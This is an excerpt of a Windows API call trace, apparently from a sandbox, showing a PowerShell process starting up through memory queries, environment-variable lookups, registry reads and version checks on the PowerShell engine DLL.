	[0058.659] VirtualQuery (in: lpAddress=0x278e10, lpBuffer=0x3500279cd0, dwLength=0x30 | out: lpBuffer=0x3500279cd0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca58000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0058.660] VirtualQuery (in: lpAddress=0x278e10, lpBuffer=0x3500279cd0, dwLength=0x30 | out: lpBuffer=0x3500279cd0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca58000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0058.660] VirtualQuery (in: lpAddress=0x278e10, lpBuffer=0x3500279cd0, dwLength=0x30 | out: lpBuffer=0x3500279cd0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca58000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0058.660] VirtualQuery (in: lpAddress=0x278e10, lpBuffer=0x3500279cd0, dwLength=0x30 | out: lpBuffer=0x3500279cd0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca58000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0058.661] VirtualQuery (in: lpAddress=0x278e10, lpBuffer=0x3500279cd0, dwLength=0x30 | out: lpBuffer=0x3500279cd0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca58000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0058.661] VirtualQuery (in: lpAddress=0x278e10, lpBuffer=0x3500279cd0, dwLength=0x30 | out: lpBuffer=0x3500279cd0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca58000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0058.661] VirtualQuery (in: lpAddress=0x278e10, lpBuffer=0x3500279cd0, dwLength=0x30 | out: lpBuffer=0x3500279cd0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca58000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0058.661] VirtualQuery (in: lpAddress=0x278e10, lpBuffer=0x3500279cd0, dwLength=0x30 | out: lpBuffer=0x3500279cd0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca58000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0058.662] VirtualQuery (in: lpAddress=0x278e10, lpBuffer=0x3500279cd0, dwLength=0x30 | out: lpBuffer=0x3500279cd0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca58000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0058.662] VirtualQuery (in: lpAddress=0x278e10, lpBuffer=0x3500279cd0, dwLength=0x30 | out: lpBuffer=0x3500279cd0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca58000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0058.662] VirtualQuery (in: lpAddress=0x278e10, lpBuffer=0x3500279cd0, dwLength=0x30 | out: lpBuffer=0x3500279cd0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca58000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0058.662] VirtualQuery (in: lpAddress=0x278e10, lpBuffer=0x3500279cd0, dwLength=0x30 | out: lpBuffer=0x3500279cd0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca58000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0058.662] VirtualQuery (in: lpAddress=0x278e10, lpBuffer=0x3500279cd0, dwLength=0x30 | out: lpBuffer=0x3500279cd0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca58000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0058.663] VirtualQuery (in: lpAddress=0x278e10, lpBuffer=0x3500279cd0, dwLength=0x30 | out: lpBuffer=0x3500279cd0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca58000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0058.663] VirtualQuery (in: lpAddress=0x278e10, lpBuffer=0x3500279cd0, dwLength=0x30 | out: lpBuffer=0x3500279cd0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca58000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0058.663] VirtualQuery (in: lpAddress=0x278e10, lpBuffer=0x3500279cd0, dwLength=0x30 | out: lpBuffer=0x3500279cd0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca58000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0058.663] VirtualQuery (in: lpAddress=0x278e10, lpBuffer=0x3500279cd0, dwLength=0x30 | out: lpBuffer=0x3500279cd0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca58000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0058.663] VirtualQuery (in: lpAddress=0x278e10, lpBuffer=0x3500279cd0, dwLength=0x30 | out: lpBuffer=0x3500279cd0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca58000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0058.663] VirtualQuery (in: lpAddress=0x278e10, lpBuffer=0x3500279cd0, dwLength=0x30 | out: lpBuffer=0x3500279cd0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca58000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0058.664] VirtualQuery (in: lpAddress=0x278e10, lpBuffer=0x3500279cd0, dwLength=0x30 | out: lpBuffer=0x3500279cd0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca58000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0058.664] VirtualQuery (in: lpAddress=0x278e10, lpBuffer=0x3500279cd0, dwLength=0x30 | out: lpBuffer=0x3500279cd0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca58000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0058.664] VirtualQuery (in: lpAddress=0x278e10, lpBuffer=0x3500279cd0, dwLength=0x30 | out: lpBuffer=0x3500279cd0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca58000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0058.664] VirtualQuery (in: lpAddress=0x278e10, lpBuffer=0x3500279cd0, dwLength=0x30 | out: lpBuffer=0x3500279cd0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca58000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0058.664] VirtualQuery (in: lpAddress=0x278e10, lpBuffer=0x3500279cd0, dwLength=0x30 | out: lpBuffer=0x3500279cd0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca58000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0058.664] VirtualQuery (in: lpAddress=0x278e10, lpBuffer=0x3500279cd0, dwLength=0x30 | out: lpBuffer=0x3500279cd0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca58000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0058.665] VirtualQuery (in: lpAddress=0x278e10, lpBuffer=0x3500279cd0, dwLength=0x30 | out: lpBuffer=0x3500279cd0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca58000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0058.674] CoTaskMemAlloc (cb=0x104) returned 0x233e39e9510
	[0058.674] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e9510, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0058.675] CoTaskMemFree (pv=0x233e39e9510) 
	[0058.677] CoTaskMemAlloc (cb=0x104) returned 0x233e39e9400
	[0058.677] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e9400, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0058.677] CoTaskMemFree (pv=0x233e39e9400) 
	[0058.677] CoTaskMemAlloc (cb=0x104) returned 0x233e39e7db0
	[0058.677] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e7db0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0058.677] CoTaskMemFree (pv=0x233e39e7db0) 
	[0058.695] CoTaskMemAlloc (cb=0x104) returned 0x233e39e80e0
	[0058.695] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e80e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0058.695] CoTaskMemFree (pv=0x233e39e80e0) 
	[0058.697] CoTaskMemAlloc (cb=0x104) returned 0x233e39e8c90
	[0058.697] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e8c90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0058.697] CoTaskMemFree (pv=0x233e39e8c90) 
	[0058.697] CoTaskMemAlloc (cb=0x104) returned 0x233e39e9400
	[0058.697] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e9400, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0058.697] CoTaskMemFree (pv=0x233e39e9400) 
	[0058.702] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027abb8 | out: phkResult=0x350027abb8*=0x628) returned 0x0
	[0058.704] RegOpenKeyExW (in: hKey=0x628, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027aba8 | out: phkResult=0x350027aba8*=0x62c) returned 0x0
	[0058.704] RegOpenKeyExW (in: hKey=0x62c, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027ac38 | out: phkResult=0x350027ac38*=0x630) returned 0x0
	[0058.706] RegQueryValueExW (in: hKey=0x630, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x350027ab7c, lpData=0x0, lpcbData=0x350027ab78*=0x0 | out: lpType=0x350027ab7c*=0x1, lpData=0x0, lpcbData=0x350027ab78*=0x56) returned 0x0
	[0058.707] CoTaskMemAlloc (cb=0x5a) returned 0x233e39dccf0
	[0058.707] RegQueryValueExW (in: hKey=0x630, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x350027ab4c, lpData=0x233e39dccf0, lpcbData=0x350027ab48*=0x56 | out: lpType=0x350027ab4c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x350027ab48*=0x56) returned 0x0
	[0058.707] CoTaskMemFree (pv=0x233e39dccf0) 
	[0058.709] SetErrorMode (uMode=0x1) returned 0x8001
	[0058.709] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x350027a9a0 | out: lpFileInformation=0x350027a9a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12d31693, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12d31693, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12d31693, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0058.710] SetErrorMode (uMode=0x8001) returned 0x1
	[0058.714] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x350027ac10 | out: lpdwHandle=0x350027ac10) returned 0x94c
	[0058.742] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x233e41457b0 | out: lpData=0x233e41457b0) returned 1
	[0058.743] VerQueryValueW (in: pBlock=0x233e41457b0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x350027ab88, puLen=0x350027ab80 | out: lplpBuffer=0x350027ab88*=0x233e414584c, puLen=0x350027ab80) returned 1
	[0058.744] VerQueryValueW (in: pBlock=0x233e41457b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x350027aaf8, puLen=0x350027aaf0 | out: lplpBuffer=0x350027aaf8*=0x233e4145928, puLen=0x350027aaf0) returned 1
	[0058.744] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0058.745] CoTaskMemAlloc (cb=0x2e) returned 0x233e39dfa10
	[0058.745] lstrcpyW (in: lpString1=0x233e39dfa10, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0058.745] CoTaskMemFree (pv=0x233e39dfa10) 
	[0058.745] VerQueryValueW (in: pBlock=0x233e41457b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x350027aaf8, puLen=0x350027aaf0 | out: lplpBuffer=0x350027aaf8*=0x233e414597c, puLen=0x350027aaf0) returned 1
	[0058.745] lstrlenW (lpString="System.Management.Automation") returned 28
	[0058.745] CoTaskMemAlloc (cb=0x3c) returned 0x233e39ea630
	[0058.745] lstrcpyW (in: lpString1=0x233e39ea630, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0058.745] CoTaskMemFree (pv=0x233e39ea630) 
	[0058.745] VerQueryValueW (in: pBlock=0x233e41457b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x350027aaf8, puLen=0x350027aaf0 | out: lplpBuffer=0x350027aaf8*=0x233e41459d8, puLen=0x350027aaf0) returned 1
	[0058.745] lstrlenW (lpString="6.1.7600.16385") returned 14
	[0058.745] CoTaskMemAlloc (cb=0x20) returned 0x233e39dc380
	[0058.745] lstrcpyW (in: lpString1=0x233e39dc380, lpString2="6.1.7600.16385" | out: lpString1="6.1.7600.16385") returned="6.1.7600.16385"
	[0058.745] CoTaskMemFree (pv=0x233e39dc380) 
	[0058.745] VerQueryValueW (in: pBlock=0x233e41457b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x350027aaf8, puLen=0x350027aaf0 | out: lplpBuffer=0x350027aaf8*=0x233e4145a18, puLen=0x350027aaf0) returned 1
	[0058.745] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0058.745] CoTaskMemAlloc (cb=0x44) returned 0x233e39eadb0
	[0058.745] lstrcpyW (in: lpString1=0x233e39eadb0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0058.745] CoTaskMemFree (pv=0x233e39eadb0) 
	[0058.745] VerQueryValueW (in: pBlock=0x233e41457b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x350027aaf8, puLen=0x350027aaf0 | out: lplpBuffer=0x350027aaf8*=0x233e4145a80, puLen=0x350027aaf0) returned 1
	[0058.745] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0058.745] CoTaskMemAlloc (cb=0x76) returned 0x233e3922da0
	[0058.745] lstrcpyW (in: lpString1=0x233e3922da0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0058.745] CoTaskMemFree (pv=0x233e3922da0) 
	[0058.746] VerQueryValueW (in: pBlock=0x233e41457b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x350027aaf8, puLen=0x350027aaf0 | out: lplpBuffer=0x350027aaf8*=0x233e4145b1c, puLen=0x350027aaf0) returned 1
	[0058.746] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0058.746] CoTaskMemAlloc (cb=0x44) returned 0x233e39e9eb0
	[0058.746] lstrcpyW (in: lpString1=0x233e39e9eb0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0058.746] CoTaskMemFree (pv=0x233e39e9eb0) 
	[0058.746] VerQueryValueW (in: pBlock=0x233e41457b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x350027aaf8, puLen=0x350027aaf0 | out: lplpBuffer=0x350027aaf8*=0x233e4145b80, puLen=0x350027aaf0) returned 1
	[0058.746] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0058.746] CoTaskMemAlloc (cb=0x58) returned 0x233e39e0f90
	[0058.746] lstrcpyW (in: lpString1=0x233e39e0f90, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0058.746] CoTaskMemFree (pv=0x233e39e0f90) 
	[0058.746] VerQueryValueW (in: pBlock=0x233e41457b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x350027aaf8, puLen=0x350027aaf0 | out: lplpBuffer=0x350027aaf8*=0x233e4145bfc, puLen=0x350027aaf0) returned 1
	[0058.746] lstrlenW (lpString="6.1.7600.16385") returned 14
	[0058.746] CoTaskMemAlloc (cb=0x20) returned 0x233e39dc380
	[0058.746] lstrcpyW (in: lpString1=0x233e39dc380, lpString2="6.1.7600.16385" | out: lpString1="6.1.7600.16385") returned="6.1.7600.16385"
	[0058.746] CoTaskMemFree (pv=0x233e39dc380) 
	[0058.746] VerQueryValueW (in: pBlock=0x233e41457b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x350027aaf8, puLen=0x350027aaf0 | out: lplpBuffer=0x350027aaf8*=0x233e41458a4, puLen=0x350027aaf0) returned 1
	[0058.746] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0058.746] CoTaskMemAlloc (cb=0x66) returned 0x233e39dcf20
	[0058.746] lstrcpyW (in: lpString1=0x233e39dcf20, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0058.746] CoTaskMemFree (pv=0x233e39dcf20) 
	[0058.746] VerQueryValueW (in: pBlock=0x233e41457b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x350027aaf8, puLen=0x350027aaf0 | out: lplpBuffer=0x350027aaf8*=0x0, puLen=0x350027aaf0) returned 0
	[0058.746] VerQueryValueW (in: pBlock=0x233e41457b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x350027aaf8, puLen=0x350027aaf0 | out: lplpBuffer=0x350027aaf8*=0x0, puLen=0x350027aaf0) returned 0
	[0058.746] VerQueryValueW (in: pBlock=0x233e41457b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x350027aaf8, puLen=0x350027aaf0 | out: lplpBuffer=0x350027aaf8*=0x0, puLen=0x350027aaf0) returned 0
	[0058.746] VerQueryValueW (in: pBlock=0x233e41457b0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x350027aac8, puLen=0x350027aac0 | out: lplpBuffer=0x350027aac8*=0x233e414584c, puLen=0x350027aac0) returned 1
	[0058.747] CoTaskMemAlloc (cb=0x204) returned 0x233e12da9e0
	[0058.747] VerLanguageNameW (in: wLang=0x0, szLang=0x233e12da9e0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0058.748] CoTaskMemFree (pv=0x233e12da9e0) 
	[0058.748] VerQueryValueW (in: pBlock=0x233e41457b0, lpSubBlock="\\", lplpBuffer=0x350027ab18, puLen=0x350027ab10 | out: lplpBuffer=0x350027ab18*=0x233e41457d8, puLen=0x350027ab10) returned 1
	[0059.037] CoTaskMemAlloc (cb=0x104) returned 0x233e39e9840
	[0059.037] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e9840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0059.037] CoTaskMemFree (pv=0x233e39e9840) 
	[0059.747] strcpy_s (in: _Dst=0x233e39da6a0, _DstSize=0x1e, _Src="Microsoft.PowerShell.Commands" | out: _Dst="Microsoft.PowerShell.Commands") returned 0x0
	[0060.406] CoCreateGuid (in: pguid=0x350027a030 | out: pguid=0x350027a030*(Data1=0xa00c0f99, Data2=0xb761, Data3=0x4c45, Data4=([0]=0xb6, [1]=0x43, [2]=0x92, [3]=0x27, [4]=0x44, [5]=0xae, [6]=0xfb, [7]=0x96))) returned 0x0
	[0060.532] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x628
	[0060.532] CoCreateGuid (in: pguid=0x350027afe0 | out: pguid=0x350027afe0*(Data1=0x4cc5ea1d, Data2=0x1381, Data3=0x4fe3, Data4=([0]=0x81, [1]=0x20, [2]=0xc8, [3]=0x2a, [4]=0x79, [5]=0x73, [6]=0x6c, [7]=0x64))) returned 0x0
	[0060.539] CoTaskMemAlloc (cb=0x104) returned 0x233e39e9400
	[0060.539] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e9400, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0060.539] CoTaskMemFree (pv=0x233e39e9400) 
	[0060.553] CsrIdentifyAlertableThread () returned 0x0
	[0060.553] CoTaskMemAlloc (cb=0x104) returned 0x233e39e9400
	[0060.553] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e9400, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0060.553] CoTaskMemFree (pv=0x233e39e9400) 
	[0060.554] CoTaskMemAlloc (cb=0x104) returned 0x233e39e9620
	[0060.554] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e9620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0060.554] CoTaskMemFree (pv=0x233e39e9620) 
	[0060.554] CoTaskMemAlloc (cb=0x104) returned 0x233e39e7b90
	[0060.554] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e7b90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0060.555] CoTaskMemFree (pv=0x233e39e7b90) 
	[0060.558] CoTaskMemAlloc (cb=0x104) returned 0x233e39e9840
	[0060.558] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e9840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0060.558] CoTaskMemFree (pv=0x233e39e9840) 
	[0060.593] CoTaskMemAlloc (cb=0x104) returned 0x233e39e7b90
	[0060.593] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e7b90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0060.593] CoTaskMemFree (pv=0x233e39e7b90) 
	[0060.594] CoTaskMemAlloc (cb=0x104) returned 0x233e39e8eb0
	[0060.594] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e8eb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0060.594] CoTaskMemFree (pv=0x233e39e8eb0) 
	[0060.596] CoTaskMemAlloc (cb=0x104) returned 0x233e39e8fc0
	[0060.596] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e8fc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0060.596] CoTaskMemFree (pv=0x233e39e8fc0) 
	[0060.775] CoTaskMemAlloc (cb=0x104) returned 0x233e39e91e0
	[0060.775] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x233e39e91e0, nSize=0x80 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 0x5d
	[0060.775] CoTaskMemFree (pv=0x233e39e91e0) 
	[0060.779] CoTaskMemAlloc (cb=0xcc) returned 0x233e397cb90
	[0060.779] ExpandEnvironmentStringsW (in: lpSrc="C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpDst=0x233e397cb90, nSize=0x64 | out: lpDst="C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 0x5e
	[0060.779] CoTaskMemFree (pv=0x233e397cb90) 
	[0060.779] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027ab58 | out: phkResult=0x350027ab58*=0x62c) returned 0x0
	[0060.780] RegQueryValueExW (in: hKey=0x62c, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x350027aadc, lpData=0x0, lpcbData=0x350027aad8*=0x0 | out: lpType=0x350027aadc*=0x2, lpData=0x0, lpcbData=0x350027aad8*=0xbc) returned 0x0
	[0060.780] CoTaskMemAlloc (cb=0xc0) returned 0x233e3925f00
	[0060.780] RegQueryValueExW (in: hKey=0x62c, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x350027aaac, lpData=0x233e3925f00, lpcbData=0x350027aaa8*=0xbc | out: lpType=0x350027aaac*=0x2, lpData="%ProgramFiles%\\WindowsPowerShell\\Modules;%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules", lpcbData=0x350027aaa8*=0xbc) returned 0x0
	[0060.780] CoTaskMemFree (pv=0x233e3925f00) 
	[0060.780] CoTaskMemAlloc (cb=0xcc) returned 0x233e397b5b0
	[0060.780] ExpandEnvironmentStringsW (in: lpSrc="%ProgramFiles%", lpDst=0x233e397b5b0, nSize=0x64 | out: lpDst="C:\\Program Files") returned 0x11
	[0060.780] CoTaskMemFree (pv=0x233e397b5b0) 
	[0060.780] CoTaskMemAlloc (cb=0xcc) returned 0x233e397ce30
	[0060.780] ExpandEnvironmentStringsW (in: lpSrc="%\\WindowsPowerShell\\Modules;%", lpDst=0x233e397ce30, nSize=0x64 | out: lpDst="%\\WindowsPowerShell\\Modules;%") returned 0x1e
	[0060.780] CoTaskMemFree (pv=0x233e397ce30) 
	[0060.780] CoTaskMemAlloc (cb=0xcc) returned 0x233e397cd50
	[0060.780] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x233e397cd50, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0060.780] CoTaskMemFree (pv=0x233e397cd50) 
	[0060.780] CoTaskMemAlloc (cb=0xcc) returned 0x233e397c3b0
	[0060.780] ExpandEnvironmentStringsW (in: lpSrc="%ProgramFiles%\\WindowsPowerShell\\Modules;%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules", lpDst=0x233e397c3b0, nSize=0x64 | out: lpDst="C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 0x5e
	[0060.780] CoTaskMemFree (pv=0x233e397c3b0) 
	[0060.782] RegCloseKey (hKey=0x62c) returned 0x0
	[0060.782] CoTaskMemAlloc (cb=0xcc) returned 0x233e397c8f0
	[0060.782] ExpandEnvironmentStringsW (in: lpSrc="C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpDst=0x233e397c8f0, nSize=0x64 | out: lpDst="C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 0x5e
	[0060.782] CoTaskMemFree (pv=0x233e397c8f0) 
	[0060.782] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027ab58 | out: phkResult=0x350027ab58*=0x62c) returned 0x0
